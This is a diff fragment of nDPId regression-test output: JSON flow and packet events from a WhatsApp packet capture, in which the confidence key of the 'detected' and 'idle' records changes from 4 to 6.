00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":147,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1655049443263,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655049443263,"pkt":"eJS0JASgYDjgxTWgCABFAAA0KCZAAD8G2iPAqAJkszzDMbVGFGZeo\/3XmmmBIoAQAVfWlwAAAQEICkchwwlHYNIU"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":148,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":3,"flow_last_seen":1655049443356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655049443356,"pkt":"eJS0JASgYDjgxTWgCABFAAA4KCdAAD8G2h7AqAJkszzDMbVGFGZeo\/3XmmmBIoAYAVeQ6QAAAQEICkchw2ZHYNIURUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655049443230,"flow_last_seen":1655049443389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655049443389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655038737650,"flow_last_seen":1655038738381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655041569928,"flow_last_seen":1655041570363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":149,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655049443230,"flow_last_seen":1655049443389,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":273,"flow_tot_l4_payload_len":277,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1655049443389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":46406,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655038737650,"flow_last_seen":1655038738381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":334,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41288,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655041569928,"flow_last_seen":1655041570363,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1655049443593,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41610,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":154,"packets-processed":153,"total-skipped-flows":0,"total-l4-payload-len":11307,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":19,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":19,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":125,"global_ts_msec":1655050704430} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655050704430,"flow_last_seen":1655050704430,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655050704430,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":154,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1655050704430,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655050704430,"pkt":"eJS0JASgYDjgxTWgCABFAAA84MFAAD8GJbDAqAJkHw1TMZ0gFGZ02VSkAAAAAKAC\/\/8otQAAAgQFtAQCCAoO3mAcAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":155,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":2,"flow_last_seen":1655050704485,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655050704485,"pkt":"eJS0JASgYDjgxTWgCABFAAA04MJAAD8GJbfAqAJkHw1TMZ0gFGZ02VSlljrOS4AQAKxhJgAAAQEICg7eYFQ9kVNR"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":156,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":3,"flow_last_seen":1655050704506,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655050704506,"pkt":"eJS0JASgYDjgxTWgCABFAAA44MNAAD8GJbLAqAJkHw1TMZ0gFGZ02VSlljrOS4AYAKwbyQAAAQEICg7eYGA9kVNRRUQAAQ=="} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655050704430,"flow_last_seen":1655050704560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655050704560,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655042688447,"flow_last_seen":1655042690163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655050704962,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":157,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655050704430,"flow_last_seen":1655050704560,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":279,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":70,"midstream":0,"thread_ts_msec":1655050704560,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"31.13.83.49","src_port":40224,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655042688447,"flow_last_seen":1655042690163,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1655050704962,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":41808,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051220512,"flow_last_seen":1655051220512,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051220512,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":162,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1655051220512,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051220512,"pkt":"eJS0JASgYDjgxTWgCABFAAA8rVBAAD8GVQHAqAJkszzDIbGeFGYTOuPqAAAAAKAC\/\/\/5owAAAgQFtAQCCAoFLFKaAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":163,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":2,"flow_last_seen":1655051220546,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051220546,"pkt":"eJS0JASgYDjgxTWgCABFAAA0rVFAAD8GVQjAqAJkszzDIbGeFGYTOuPr8T6CsoAQAKwtBgAAAQEICgUsUry7e8sg"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":164,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":3,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051220578,"pkt":"eJS0JASgYDjgxTWgCABFAAA4rVJAAD8GVQPAqAJkszzDIbGeFGYTOuPr8T6CsoAYAKznlAAAAQEICgUsUty7e8sgRUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051220512,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051220578,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655043596112,"flow_last_seen":1655043596381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051220729,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":165,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051220512,"flow_last_seen":1655051220578,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051220578,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45470,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655043596112,"flow_last_seen":1655043596381,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051220729,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37482,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":170,"packets-processed":169,"total-skipped-flows":0,"total-l4-payload-len":13293,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":21,"total-detection-updates":0,"total-updates":0,"current-active-flows":6,"total-active-flows":21,"total-idle-flows":15,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":138,"global_ts_msec":1655051492307} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051492307,"flow_last_seen":1655051492307,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051492307,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":1,"flow_last_seen":1655051492307,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051492307,"pkt":"eJS0JASgYDjgxTWgCABFAAA8gfhAAD8GgEnAqAJkszzDMahMFGbuqHaiAAAAAKAC\/\/+qzgAAAgQFtAQCCAo39wnAAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":2,"flow_last_seen":1655051492339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051492339,"pkt":"eJS0JASgYDjgxTWgCABFAAA0gflAAD8GgFDAqAJkszzDMahMFGbuqHajLwsyzYAQAIACagAAAQEICjf3Cd8Kl2oU"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_packet_id":3,"flow_last_seen":1655051492356,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051492356,"pkt":"eJS0JASgYDjgxTWgCABFAAA4gfpAAD8GgEvAqAJkszzDMahMFGbuqHajLwsyzYAYAIC9BgAAAQEICjf3CfEKl2oURUQAAQ=="} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051492307,"flow_last_seen":1655051492493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655051492493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":173,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051492307,"flow_last_seen":1655051492493,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":290,"flow_tot_l4_payload_len":294,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1655051492493,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43084,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":177,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655051794002,"flow_last_seen":1655051794002,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655051794002,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":1,"flow_last_seen":1655051794002,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655051794002,"pkt":"eJS0JASgYDjgxTWgCABFAAA8Ow1AAD8Gx0TAqAJkszzDIbIiFGatOxWzAAAAAKAC\/\/9tHgAAAgQFtAQCCAoFNRLJAAAAAAEDAwk="} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":2,"flow_last_seen":1655051794036,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655051794036,"pkt":"eJS0JASgYDjgxTWgCABFAAA0Ow5AAD8Gx0vAqAJkszzDIbIiFGatOxW0\/J8dd4AQAKwWfwAAAQEICgU1Eusr+T5\/"} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":179,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_packet_id":3,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655051794037,"pkt":"eJS0JASgYDjgxTWgCABFAAA4Ow9AAD8Gx0bAqAJkszzDIbIiFGatOxW0\/J8dd4AYAKzRLAAAAQEICgU1Euwr+T5\/RUQAAQ=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051794002,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051794037,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044288744,"flow_last_seen":1655044288931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051794206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":180,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1655051794002,"flow_last_seen":1655051794037,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":7,"flow_tot_l4_payload_len":11,"flow_avg_l4_payload_len":2,"midstream":0,"thread_ts_msec":1655051794037,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":45602,"dst_port":5222,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1655044288744,"flow_last_seen":1655044288931,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1258,"flow_tot_l4_payload_len":1273,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1655051794206,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.33","src_port":37582,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"WhatsApp","breed":"Acceptable","category":"Chat"}} 00563{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","packets-captured":185,"packets-processed":184,"total-skipped-flows":0,"total-l4-payload-len":14860,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":23,"total-detection-updates":0,"total-updates":0,"current-active-flows":7,"total-active-flows":23,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":150,"global_ts_msec":1655052148615} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1655052148615,"flow_last_seen":1655052148615,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1655052148615,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"179.60.195.49","src_port":43152,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":185,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1655052148615,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1655052148615,"pkt":"eJS0JASgYDjgxTWgCABFAAA8kfpAAD8GcEfAqAJkszzDMaiQFGZmurw1AAAAAKAC\/\/+h\/wAAAgQFtAQCCAo3+VSkAAAAAAEDAwk="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":186,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1655052148658,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1655052148658,"pkt":"eJS0JASgYDjgxTWgCABFAAA0kftAAD8GcE7AqAJkszzDMaiQFGZmurw2KlSpWIAQAIA0yQAAAQEICjf5VPJAoYbY"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":187,"source":"whatsapp.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":3,"flow_last_seen":1655052148713,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1655052148713,"pkt":"eJS0JASgYDjgxTWgCABFAAA4kfxAAD8GcEnAqAJkszzDMaiQFGZmurw2KlSpWIAYAIDvQAAAAQEICjf5VSlAoYbYRUQAAQ=="} 